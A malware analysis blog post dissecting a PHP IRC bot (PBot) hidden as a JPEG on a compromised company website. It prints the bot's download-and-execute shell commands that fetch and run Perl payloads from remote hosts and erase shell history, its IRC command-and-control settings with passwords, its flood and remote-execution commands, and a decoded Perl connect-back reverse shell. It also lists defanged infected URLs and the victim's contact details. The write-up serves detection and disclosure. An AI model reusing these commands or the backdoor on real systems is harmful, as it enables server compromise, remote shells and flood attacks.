It has been a long time for analyzing an active PBot, our previous post abut Pbot are here>>[CLICK]. This new one just spotted accidentally in my watch this new year. I trailed back infection started from before Christmas and noted its activities until yesterday. There's nothing special about this infection instead the ignorance of the domain owner which I informed him by severeal times, without getting response nor removal act.
This PBot is a plain textual script, camouflage its filename with a JPEG file extension, yes it contains some severe malicious functionalities of PBot which people should know about.
Below is the capture of its GUI, if you know how to execute this well:
(click to enlarge the pic below)
Victim: hegeman.com, Infection method probability: credentials (90%), hacked (10%) Contacts: (for alert information)Registrant: Hegeman Nijverdal BV Postbus 224 Nijverdal, 7440AE, NL Administrative Contact: Hoksbergen, B b.hoksbergen@hegeman.com Postbus 224 Nijverdal, 7440AE, NL +31.548611000 Technical Contact: Diensten, Online kpni@kpn.com Maanplein 55 Den Haag, 2516CK, NL +31.8000403Infected/Injected URLs:h00p://hegeman.com/configs.jpg h00p://hegeman.com/images/configs.jpg h00p://hegeman.com/tmp/configs.jpg? h00p://www.hegeman.com/configs.jpg h00p://www.hegeman.com/images/configs.jpg h00p://www.hegeman.com/tmp/configs.jpgMy log in downloading above url to get sample:Resolving hegeman.com... seconds 0.00, 213.75.22.52 Caching hegeman.com => 213.75.22.52 Connecting to hegeman.com|213.75.22.52|:80... seconds 0.00, connected. Created socket 1896. Releasing 0x003d5448 (new refcount 1). GET /configs.jpg HTTP/1.0 Accept: */* Host: hegeman.com Connection: Keep-Alive HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Fri, 04 Jan 2013 07:34:48 GMT Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635 Last-Modified: Thu, 03 Jan 2013 00:44:47 GMT ETag: "961813c-99e7-ab6eddc0" Accept-Ranges: bytes Content-Length: 39399 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg 200 OK Registered socket 1896 for persistent reuse. Length: 39,399 (38K) [image/jpeg] 17:39:35 (10.59 KB/s) - `configs.jpg' saved [39399/39399]What looks like an image JPEG file is actually a script, to be executed under infected machine's PHP from remote via infected url. Let's see the significant malicious points of this script: The header of this PBot:_/ |_ __ _____ ___ _____| |__ _____ __| _/______ _ __ \ __\ | \ \/ / / ___/ | \\__ \ / __ |/ _ \ \/ \/ / | | | | /> < \___ \| Y \/ __ \_/ /_/ ( <_> ) / |__| |____//__/\_ \_____/____ >___| (____ /\____ |\____/ \/\_/ \/_____/ \/ \/ \/ \/ <br/><? $dir = @getcwd(); echo "DON TUKULESTO <br>"; $OS = @PHP_OS; echo "OSTYPE :$OS <br>"; echo "uname -a; $uname <br>"; $free = disk_free_space($dir); $ob = @ini_get("open_basedir"); $df = @ini_get("disable_functions"); if( ini_get('safe_mode') ) { echo "SM: 1 \\ ";It downloads the components from remote:$url="h00p://miri.wap.sh/"; exec('cd /tmp;curl -O '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;'); exec('cd /tmp;GET '.$url.'mild.txt > mild.txt;perl mild.txt;rm -rf mild.txt*;'); exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;'); exec('cd /tmp;lwp-download '.$url.'mild.txt;perl mild.txt;perl mild.txt;rm -rf mild.txt*;'); exec('cd /tmp;fetch '.$url.'mild.txt >mild.txt;perl mild.txt;rm -rf mild.txt*;');Or download from "other" server with varied method of execution like: exec, @popen, shell_exec, system, passthru, etc..., i.e.:@popen('cd /tmp;wget '.$url.'perl.txt;perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); @popen('cd /tmp;curl -O '.$url.'perl.txt; perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); @popen('cd /tmp;lwp-download '.$url.'perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); @popen('cd /tmp;lynx -source '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); @popen('cd /tmp;fetch '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); @popen('cd /tmp;GET '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r"); :This PBot has the connectivity contains the bad actor's IRC ID behind it:var $config=array("server"=>"irc.javairc.org", // ip/host da rede "port"=>"6667", // porta da rede "pass"=>"", // senha da rede "prefix"=>"dos", // nick do bot "maxrand"=>"4", // quantidade de numero no nick do bot "chan"=>"#seve", // canal que os bots vao entrar "chan2"=>"#seve", // canal aonde os bots v縊 mandar as vulns ao conectar (-n) "key"=>"sempakz", // senha do canal "modes"=>"+p", // modos do bot "password"=>"sempakz", // senha pra acesso (.user SENHA) "trigger"=>".", // prefico dos comandos "hostauth"=>"@newbie.aja" // host dos owners (* for any hostname)Below are Pbot's (basic) commands, you'll see some remote act + TCP/UDP flood commands..* .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dns <IP|HOST> //dns lookup * .download <URL> <filename> //download a file * .exec <cmd> // uses exec() //execute a command * .sexec <cmd> // uses shell_exec() //execute a command * .cmd <cmd> // uses popen() //execute a command * .info //get system information * .php <php code> // uses eval() //execute php code * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack * .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack * .raw <cmd> //raw IRC command * .rndnick //change nickname * .pscan <host> <port> //port scan * .safe // test safe_mode (dvl) * .inbox <to> // test inbox (dvl) * .conback <ip> <port> // conect back (dvl) * .uname // return shell's uname using a php function (dvl)The callback is as per below function, to be saved+executed locally with perl (dc.pl):function conback($ip,$port) { $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port"); $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw=="; if (is_writable("/tmp")) { if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); } $fp=fopen("/tmp/dc.pl","w"); fwrite($fp,base64_decode($dc_source)); passthru("perl /tmp/dc.pl $ip $port &"); unlink("/tmp/dc.pl");Whatever the above base64 hashed code is, never be good, Let's decode it to find out what it is.. end up w/the backdoor logic:#!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n";↑Now we know how this Bot connect motherships, this protocol can be used to send/receive data. The Virus Total detection ratio is not bad at all:MD5: 06a940dd7824d6a3a6d5b484bb7ef9d5 File size: 38.5 KB ( 39399 bytes ) File name: configs.jpg File type: PHP Detection ratio: 29 / 46 URL:------>>[CLICK]I wonder why the owner won't delete this script from the server.. For more research of the recent PBot infections, below are infected urls:h00p://eskipazari・com/images/products/large/rabot.txt h00p://www.bohmans・ru/netcat/modules/forum2/images/pbbb.txt h00p://asiandogs.・u/dog/crime/byroe.jpg h00p://agefocus・net/wp-includes/js/jcrop/six/star.jpg h00p://myghost.myqr・sg/bbs/logs/rabot.txt h00p://www.nenskinder・com/wp-content/rabot.txt h00p://www.airsoftpark・com/custompatchimg/pa.txt h00p://neverbeentobali・com/wp-content/rabot.txt h00p://flickr.com.oyun-max・com/bot.txt
#MalwareMustDie!
